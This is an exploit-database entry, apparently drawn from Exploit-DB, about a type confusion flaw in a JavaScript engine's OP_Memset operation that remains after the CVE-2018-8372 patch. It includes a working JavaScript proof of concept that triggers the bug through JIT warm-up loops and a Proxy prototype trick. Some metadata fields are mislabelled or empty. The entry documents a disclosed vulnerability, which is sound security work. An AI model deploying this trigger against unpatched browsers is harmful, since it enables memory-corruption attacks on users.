Type Confusion in OP_Memset

vendor:

Unknown

by:

Anonymous

7.5

CVSS

HIGH

Type Confusion

843

CWE

Product Name: Unknown

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: YES

Related CWE: CVE-2018-8372

CPE: Unknown

Metasploit: https://www.rapid7.com/db/vulnerabilities/msft-cve-2018-8372/

Other Scripts: N/A

Platforms Tested: None

2018

Type Confusion in OP_Memset

Since the patch for CVE-2018-8372, it checks all inputs to native arrays, and if any input equals to the MissingItem value which can cause type confusion, it starts the bailout process. But it doesn't check the "value" argument to OP_Memset. This can be exploited in the same way as for issue 1581.

Mitigation:

Ensure that all inputs to native arrays are checked and that the "value" argument to OP_Memset is also checked.

Source

Exploit-DB raw data:

/*
Since the patch for CVE-2018-8372, it checks all inputs to native arrays, and if any input equals to the MissingItem value which can cause type confusion, it starts the bailout process. But it doesn't check the "value" argument to OP_Memset. This can be exploited in the same way as for   issue 1581  .

PoC:
*/

function memset(arr, value, n) {
    for (let i = 0; i < n; i++) {
        arr[i] = value;
    }
}

function trigger(arr, buggy) {
    let tmp = [1];

    arr.length;

    let res = tmp.concat(buggy);
    arr[0] = 0x1234;
    arr[1] = 0;
}

function main() {
    let tmp = (new Array(100)).fill(1);
    for (let i = 0; i < 500; i++) {
        memset(tmp, 1, tmp.length);
        trigger(tmp, [1]);
    }

    setTimeout(() => {
        let buggy = [1];
        let arr = [1, 2];

        arr.getPrototypeOf = Object.prototype.valueOf;

        buggy.__proto__ = new Proxy({}, arr);

        memset(buggy, -524286, 1);
        trigger(arr, buggy);

        alert(arr);
    }, 100);
}

main();